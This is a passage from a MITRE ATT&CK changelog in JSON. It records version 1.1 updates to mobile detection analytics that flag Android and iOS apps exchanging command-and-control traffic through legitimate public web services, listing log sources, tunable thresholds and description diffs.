                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
                            "name": "MobileEDR:telemetry",
                            "channel": "Background work scheduler, job execution, foreground-service start, or persistent service activation immediately preceded retrieve-then-write exchange with public web-service platform"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
                            "name": "android:MDMLog",
                            "channel": "App identity performing bidirectional exchange was unmanaged, outside approved app baseline, or not permitted to use detected public web-service class for read/write operations"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "TimeWindow",
                            "description": "Correlation window between retrieval and outbound write over the same web-service class."
                        },
                        {
                            "field": "AllowedAppList",
                            "description": "Approved app identities vary by organization, business unit, and device group."
                        },
                        {
                            "field": "AllowedServiceClasses",
                            "description": "Some apps legitimately perform read/write operations against collaboration, storage, or messaging services."
                        },
                        {
                            "field": "AllowedReadWriteMappings",
                            "description": "Defines which apps are expected to both retrieve and submit content to a given public service class."
                        },
                        {
                            "field": "RecentUserInteractionWindow",
                            "description": "Defines how close the bidirectional exchange must be to user activity to be considered expected."
                        },
                        {
                            "field": "BeaconIntervalTolerance",
                            "description": "Allowed recurrence interval for repeated bidirectional exchanges varies by app type."
                        },
                        {
                            "field": "ForegroundStateRequired",
                            "description": "Some apps should only perform read/write web interactions while foregrounded."
                        },
                        {
                            "field": "InboundOutboundRatioThreshold",
                            "description": "Expected ratio of response size to outbound write size varies by legitimate app workflow."
                        }
                    ],
                    "x_mitre_platforms": [
                        "Android"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_mutable_elements']\": [{\"field\": \"TimeWindow\", \"description\": \"Correlation window between retrieval and outbound write over the same web-service class.\"}, {\"field\": \"AllowedAppList\", \"description\": \"Approved app identities vary by organization, business unit, and device group.\"}, {\"field\": \"AllowedServiceClasses\", \"description\": \"Some apps legitimately perform read/write operations against collaboration, storage, or messaging services.\"}, {\"field\": \"AllowedReadWriteMappings\", \"description\": \"Defines which apps are expected to both retrieve and submit content to a given public service class.\"}, {\"field\": \"RecentUserInteractionWindow\", \"description\": \"Defines how close the bidirectional exchange must be to user activity to be considered expected.\"}, {\"field\": \"BeaconIntervalTolerance\", \"description\": \"Allowed recurrence interval for repeated bidirectional exchanges varies by app type.\"}, {\"field\": \"ForegroundStateRequired\", \"description\": \"Some apps should only perform read/write web interactions while foregrounded.\"}, {\"field\": \"InboundOutboundRatioThreshold\", \"description\": \"Expected ratio of response size to outbound write size varies by legitimate app workflow.\"}]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-03-18 16:14:55.614000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['description']\": {\"new_value\": \"The defender correlates repeated inbound retrieval and outbound submission activity by the same Android app identity to the same legitimate public web-service class within a short operational window, where the two-way exchange is inconsistent with the app's approved role, interaction model, or background behavior baseline. The strongest Android evidence is app-attributed communication to collaboration, social, cloud storage, code-hosting, messaging, or generic HTTPS platforms where requests that retrieve content are followed by app-attributed posts, uploads, document updates, API writes, or repeated small bidirectional exchanges, especially when they occur while the app is backgrounded, while the device is locked, without recent user interaction, or shortly after local staging or protected-resource access.\", \"old_value\": \"Application vetting services may provide a list of connections made or received by an application, or a list of domains contacted by the application.\\nMany properly configured firewalls may naturally block bidirectional command and control traffic.\", \"diff\": \"--- \\n+++ \\n@@ -1,2 +1 @@\\n-Application vetting services may provide a list of connections made or received by an application, or a list of domains contacted by the application.\\n-Many properly configured firewalls may naturally block bidirectional command and control traffic.\\n+The defender correlates repeated inbound retrieval and outbound submission activity by the same Android app identity to the same legitimate public web-service class within a short operational window, where the two-way exchange is inconsistent with the app's approved role, interaction model, or background behavior baseline. The strongest Android evidence is app-attributed communication to collaboration, social, cloud storage, code-hosting, messaging, or generic HTTPS platforms where requests that retrieve content are followed by app-attributed posts, uploads, document updates, API writes, or repeated small bidirectional exchanges, especially when they occur while the app is backgrounded, while the device is locked, without recent user interaction, or shortly after local staging or protected-resource access.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}, \"root['x_mitre_log_source_references'][0]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c\", \"name\": \"VPN:MobileProxy\", \"channel\": \"App-attributed session to public web-service domain included inbound content retrieval followed by outbound POST, PUT, upload, comment, message send, document update, or API write to same service class within TimeWindow\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--764ee29e-48d6-4934-8e6b-7a606aaaafc0\", \"name\": \"Application Vetting\", \"channel\": \"None\"}}, \"root['x_mitre_log_source_references'][1]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c\", \"name\": \"VPN:MobileProxy\", \"channel\": \"Repeated alternating inbound and outbound sessions to same public web-service domain or API endpoint occurred from same app identity with stable recurrence interval\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--181a9f8c-c780-4f1f-91a8-edb770e904ba\", \"name\": \"Network Traffic\", \"channel\": \"None\"}}}, \"iterable_item_added\": {\"root['x_mitre_log_source_references'][2]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c\", \"name\": \"VPN:MobileProxy\", \"channel\": \"Outbound write operation to public web-service domain occurred after small inbound response retrieval from same domain or service class without preceding user-visible foreground activity\"}, \"root['x_mitre_log_source_references'][3]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"AppState=background when bidirectional exchange with public web-service domain began and no foreground transition occurred between retrieval and outbound write\"}, \"root['x_mitre_log_source_references'][4]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"DeviceLockState=locked during inbound retrieval and subsequent outbound write sequence to public web-service platform\"}, \"root['x_mitre_log_source_references'][5]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"LastUserInteractionDelta exceeded threshold before retrieve-then-write exchange to public web-service domain from same app identity\"}, \"root['x_mitre_log_source_references'][6]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"Burst write to cache, buffer, temp, staging, or export path occurred between inbound retrieval and outbound write to same public web-service class\"}, \"root['x_mitre_log_source_references'][7]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"Background work scheduler, job execution, foreground-service start, or persistent service activation immediately preceded retrieve-then-write exchange with public web-service platform\"}, \"root['x_mitre_log_source_references'][8]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43\", \"name\": \"android:MDMLog\", \"channel\": \"App identity performing bidirectional exchange was unmanaged, outside approved app baseline, or not permitted to use detected public web-service class for read/write operations\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to126__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to126__0\"><a href=\"#difflib_chg_to126__top\">t</a></td><td class=\"diff_header\" id=\"from126_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">Application&nbsp;vetting&nbsp;services&nbsp;may&nbsp;provide&nbsp;a&nbsp;list&nbsp;of&nbsp;connectio</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to126__top\">t</a></td><td class=\"diff_header\" id=\"to126_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">The&nbsp;defender&nbsp;correlates&nbsp;repeated&nbsp;inbound&nbsp;retrieval&nbsp;and&nbsp;outbo</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ns&nbsp;made&nbsp;or&nbsp;received&nbsp;by&nbsp;an&nbsp;application,&nbsp;or&nbsp;a&nbsp;list&nbsp;of&nbsp;domains&nbsp;</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">und&nbsp;submission&nbsp;activity&nbsp;by&nbsp;the&nbsp;same&nbsp;Android&nbsp;app&nbsp;identity&nbsp;to&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">contacted&nbsp;by&nbsp;the&nbsp;application.&nbsp;Many&nbsp;properly&nbsp;configured&nbsp;firew</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">the&nbsp;same&nbsp;legitimate&nbsp;public&nbsp;web-service&nbsp;class&nbsp;within&nbsp;a&nbsp;short&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">alls&nbsp;may&nbsp;naturally&nbsp;block&nbsp;bidirectional&nbsp;command&nbsp;and&nbsp;control&nbsp;t</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">operational&nbsp;window,&nbsp;where&nbsp;the&nbsp;two-way&nbsp;exchange&nbsp;is&nbsp;inconsiste</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">raffic.</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">nt&nbsp;with&nbsp;the&nbsp;app's&nbsp;approved&nbsp;role,&nbsp;interaction&nbsp;model,&nbsp;or&nbsp;backg</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">round&nbsp;behavior&nbsp;baseline.&nbsp;The&nbsp;strongest&nbsp;Android&nbsp;evidence&nbsp;is&nbsp;a</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">pp-attributed&nbsp;communication&nbsp;to&nbsp;collaboration,&nbsp;social,&nbsp;cloud&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">storage,&nbsp;code-hosting,&nbsp;messaging,&nbsp;or&nbsp;generic&nbsp;HTTPS&nbsp;platforms</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;where&nbsp;requests&nbsp;that&nbsp;retrieve&nbsp;content&nbsp;are&nbsp;followed&nbsp;by&nbsp;app-at</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">tributed&nbsp;posts,&nbsp;uploads,&nbsp;document&nbsp;updates,&nbsp;API&nbsp;writes,&nbsp;or&nbsp;re</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">peated&nbsp;small&nbsp;bidirectional&nbsp;exchanges,&nbsp;especially&nbsp;when&nbsp;they&nbsp;o</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ccur&nbsp;while&nbsp;the&nbsp;app&nbsp;is&nbsp;backgrounded,&nbsp;while&nbsp;the&nbsp;device&nbsp;is&nbsp;lock</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ed,&nbsp;without&nbsp;recent&nbsp;user&nbsp;interaction,&nbsp;or&nbsp;shortly&nbsp;after&nbsp;local&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">staging&nbsp;or&nbsp;protected-resource&nbsp;access.</span></td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--c08bd552-98fd-446d-b848-3c43b3b766f1",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2026-03-18 16:25:11.215000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0700#AN1817",
                            "external_id": "AN1817"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1817",
                    "description": "The defender correlates repeated retrieval and outbound submission activity from a supervised device or managed iOS app to the same legitimate public web-service class where the two-way exchange does not fit the bundle's approved role or expected background-refresh model. The strongest iOS evidence is managed-app or device-attributed communication to collaboration, storage, messaging, social, or generic HTTPS platforms where inbound content fetches are followed by outbound writes, uploads, updates, or message submissions within a short window, especially when occurring during background refresh, while the device is locked, or without recent user interaction. Because direct local runtime visibility is weaker than Android, the primary analytic is anchored on network directionality plus supervised managed-app and device-state context.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c",
                            "name": "VPN:MobileProxy",
                            "channel": "App-attributed session to public web-service domain included inbound content retrieval followed by outbound POST, PUT, upload, comment, message send, document update, or API write to same service class within TimeWindow"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c",
                            "name": "VPN:MobileProxy",
                            "channel": "Repeated alternating inbound and outbound sessions to same public web-service domain or API endpoint occurred from same app identity with stable recurrence interval"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c",
                            "name": "VPN:MobileProxy",
                            "channel": "Outbound write operation to public web-service domain occurred after small inbound response retrieval from same domain or service class without preceding user-visible foreground activity"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9",
                            "name": "MobileEDR:telemetry",
                            "channel": "DeviceLockState=locked during inbound retrieval and subsequent outbound write sequence to public web-service platform"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9",
                            "name": "MobileEDR:telemetry",
                            "channel": "LastUserInteractionDelta exceeded threshold before retrieve-then-write exchange to public web-service domain from same app identity"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9",
                            "name": "MobileEDR:telemetry",
                            "channel": "BackgroundRefresh or background activity was active when retrieve-then-write exchange with public web-service domain occurred"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
                            "name": "iOS:MDMLog",
                            "channel": "Bundle performing bidirectional exchange was not present in approved managed-app baseline or was not permitted to use detected public web-service class for read/write operations"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
                            "name": "iOS:unifiedlog",
                            "channel": "Background task, networking, or app-activation subsystem event occurred immediately before or during retrieve-then-write exchange with public web-service platform"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "TimeWindow",
                            "description": "Correlation window between retrieval and outbound write over the same public web-service class."
                        },
                        {
                            "field": "SupervisedRequired",
                            "description": "Strongest app-governance and bundle-baseline analytics depend on supervised iOS devices."
                        },
                        {
                            "field": "AllowedManagedApps",
                            "description": "Approved managed bundle identities vary by organization and device profile."
                        },
                        {
                            "field": "AllowedServiceClasses",
                            "description": "Some managed apps legitimately perform bidirectional exchanges with collaboration, storage, or messaging services."
                        },
                        {
                            "field": "AllowedReadWriteMappings",
                            "description": "Defines which bundles are expected to both retrieve and submit content to a given public service class."
                        },
                        {
                            "field": "BackgroundRefreshBaseline",
                            "description": "Expected background read/write network behavior differs across managed app categories."
                        },
                        {
                            "field": "RecentUserInteractionWindow",
                            "description": "Defines how close the bidirectional exchange must be to user activity to be considered expected."
                        },
                        {
                            "field": "BeaconIntervalTolerance",
                            "description": "Allowed recurrence interval for repeated bidirectional exchanges varies by bundle type."
                        }
                    ],
                    "x_mitre_platforms": [
                        "iOS"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_mutable_elements']\": [{\"field\": \"TimeWindow\", \"description\": \"Correlation window between retrieval and outbound write over the same public web-service class.\"}, {\"field\": \"SupervisedRequired\", \"description\": \"Strongest app-governance and bundle-baseline analytics depend on supervised iOS devices.\"}, {\"field\": \"AllowedManagedApps\", \"description\": \"Approved managed bundle identities vary by organization and device profile.\"}, {\"field\": \"AllowedServiceClasses\", \"description\": \"Some managed apps legitimately perform bidirectional exchanges with collaboration, storage, or messaging services.\"}, {\"field\": \"AllowedReadWriteMappings\", \"description\": \"Defines which bundles are expected to both retrieve and submit content to a given public service class.\"}, {\"field\": \"BackgroundRefreshBaseline\", \"description\": \"Expected background read/write network behavior differs across managed app categories.\"}, {\"field\": \"RecentUserInteractionWindow\", \"description\": \"Defines how close the bidirectional exchange must be to user activity to be considered expected.\"}, {\"field\": \"BeaconIntervalTolerance\", \"description\": \"Allowed recurrence interval for repeated bidirectional exchanges varies by bundle type.\"}]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-03-18 16:25:11.215000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['description']\": {\"new_value\": \"The defender correlates repeated retrieval and outbound submission activity from a supervised device or managed iOS app to the same legitimate public web-service class where the two-way exchange does not fit the bundle's approved role or expected background-refresh model. The strongest iOS evidence is managed-app or device-attributed communication to collaboration, storage, messaging, social, or generic HTTPS platforms where inbound content fetches are followed by outbound writes, uploads, updates, or message submissions within a short window, especially when occurring during background refresh, while the device is locked, or without recent user interaction. Because direct local runtime visibility is weaker than Android, the primary analytic is anchored on network directionality plus supervised managed-app and device-state context.\", \"old_value\": \"Application vetting services may provide a list of connections made or received by an application, or a list of domains contacted by the application.\\nMany properly configured firewalls may naturally block bidirectional command and control traffic.\", \"diff\": \"--- \\n+++ \\n@@ -1,2 +1 @@\\n-Application vetting services may provide a list of connections made or received by an application, or a list of domains contacted by the application.\\n-Many properly configured firewalls may naturally block bidirectional command and control traffic.\\n+The defender correlates repeated retrieval and outbound submission activity from a supervised device or managed iOS app to the same legitimate public web-service class where the two-way exchange does not fit the bundle's approved role or expected background-refresh model. The strongest iOS evidence is managed-app or device-attributed communication to collaboration, storage, messaging, social, or generic HTTPS platforms where inbound content fetches are followed by outbound writes, uploads, updates, or message submissions within a short window, especially when occurring during background refresh, while the device is locked, or without recent user interaction. Because direct local runtime visibility is weaker than Android, the primary analytic is anchored on network directionality plus supervised managed-app and device-state context.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}, \"root['x_mitre_log_source_references'][0]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c\", \"name\": \"VPN:MobileProxy\", \"channel\": \"App-attributed session to public web-service domain included inbound content retrieval followed by outbound POST, PUT, upload, comment, message send, document update, or API write to same service class within TimeWindow\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--764ee29e-48d6-4934-8e6b-7a606aaaafc0\", \"name\": \"Application Vetting\", \"channel\": \"None\"}}, \"root['x_mitre_log_source_references'][1]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c\", \"name\": \"VPN:MobileProxy\", \"channel\": \"Repeated alternating inbound and outbound sessions to same public web-service domain or API endpoint occurred from same app identity with stable recurrence interval\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--181a9f8c-c780-4f1f-91a8-edb770e904ba\", \"name\": \"Network Traffic\", \"channel\": \"None\"}}}, \"iterable_item_added\": {\"root['x_mitre_log_source_references'][2]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c\", \"name\": \"VPN:MobileProxy\", \"channel\": \"Outbound write operation to public web-service domain occurred after small inbound response retrieval from same domain or service class without preceding user-visible foreground activity\"}, \"root['x_mitre_log_source_references'][3]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"DeviceLockState=locked during inbound retrieval and subsequent outbound write sequence to public web-service platform\"}, \"root['x_mitre_log_source_references'][4]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"LastUserInteractionDelta exceeded threshold before retrieve-then-write exchange to public web-service domain from same app identity\"}, \"root['x_mitre_log_source_references'][5]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"BackgroundRefresh or background activity was active when retrieve-then-write exchange with public web-service domain occurred\"}, \"root['x_mitre_log_source_references'][6]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43\", \"name\": \"iOS:MDMLog\", \"channel\": \"Bundle performing bidirectional exchange was not present in approved managed-app baseline or was not permitted to use detected public web-service class for read/write operations\"}, \"root['x_mitre_log_source_references'][7]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e\", \"name\": \"iOS:unifiedlog\", \"channel\": \"Background task, networking, or app-activation subsystem event occurred immediately before or during retrieve-then-write exchange with public web-service platform\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to147__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to147__0\"><a href=\"#difflib_chg_to147__top\">t</a></td><td class=\"diff_header\" id=\"from147_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">Application&nbsp;vetting&nbsp;services&nbsp;may&nbsp;provide&nbsp;a&nbsp;list&nbsp;of&nbsp;connectio</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to147__top\">t</a></td><td class=\"diff_header\" id=\"to147_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">The&nbsp;defender&nbsp;correlates&nbsp;repeated&nbsp;retrieval&nbsp;and&nbsp;outbound&nbsp;subm</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ns&nbsp;made&nbsp;or&nbsp;received&nbsp;by&nbsp;an&nbsp;application,&nbsp;or&nbsp;a&nbsp;list&nbsp;of&nbsp;domains&nbsp;</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ission&nbsp;activity&nbsp;from&nbsp;a&nbsp;supervised&nbsp;device&nbsp;or&nbsp;managed&nbsp;iOS&nbsp;app&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">contacted&nbsp;by&nbsp;the&nbsp;application.&nbsp;Many&nbsp;properly&nbsp;configured&nbsp;firew</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">to&nbsp;the&nbsp;same&nbsp;legitimate&nbsp;public&nbsp;web-service&nbsp;class&nbsp;where&nbsp;the&nbsp;tw</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">alls&nbsp;may&nbsp;naturally&nbsp;block&nbsp;bidirectional&nbsp;command&nbsp;and&nbsp;control&nbsp;t</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">o-way&nbsp;exchange&nbsp;does&nbsp;not&nbsp;fit&nbsp;the&nbsp;bundle's&nbsp;approved&nbsp;role&nbsp;or&nbsp;ex</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">raffic.</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">pected&nbsp;background-refresh&nbsp;model.&nbsp;The&nbsp;strongest&nbsp;iOS&nbsp;evidence&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">is&nbsp;managed-app&nbsp;or&nbsp;device-attributed&nbsp;communication&nbsp;to&nbsp;collabo</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ration,&nbsp;storage,&nbsp;messaging,&nbsp;social,&nbsp;or&nbsp;generic&nbsp;HTTPS&nbsp;platfor</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ms&nbsp;where&nbsp;inbound&nbsp;content&nbsp;fetches&nbsp;are&nbsp;followed&nbsp;by&nbsp;outbound&nbsp;wr</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ites,&nbsp;uploads,&nbsp;updates,&nbsp;or&nbsp;message&nbsp;submissions&nbsp;within&nbsp;a&nbsp;shor</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">t&nbsp;window,&nbsp;especially&nbsp;when&nbsp;occurring&nbsp;during&nbsp;background&nbsp;refres</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">h,&nbsp;while&nbsp;the&nbsp;device&nbsp;is&nbsp;locked,&nbsp;or&nbsp;without&nbsp;recent&nbsp;user&nbsp;intera</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td 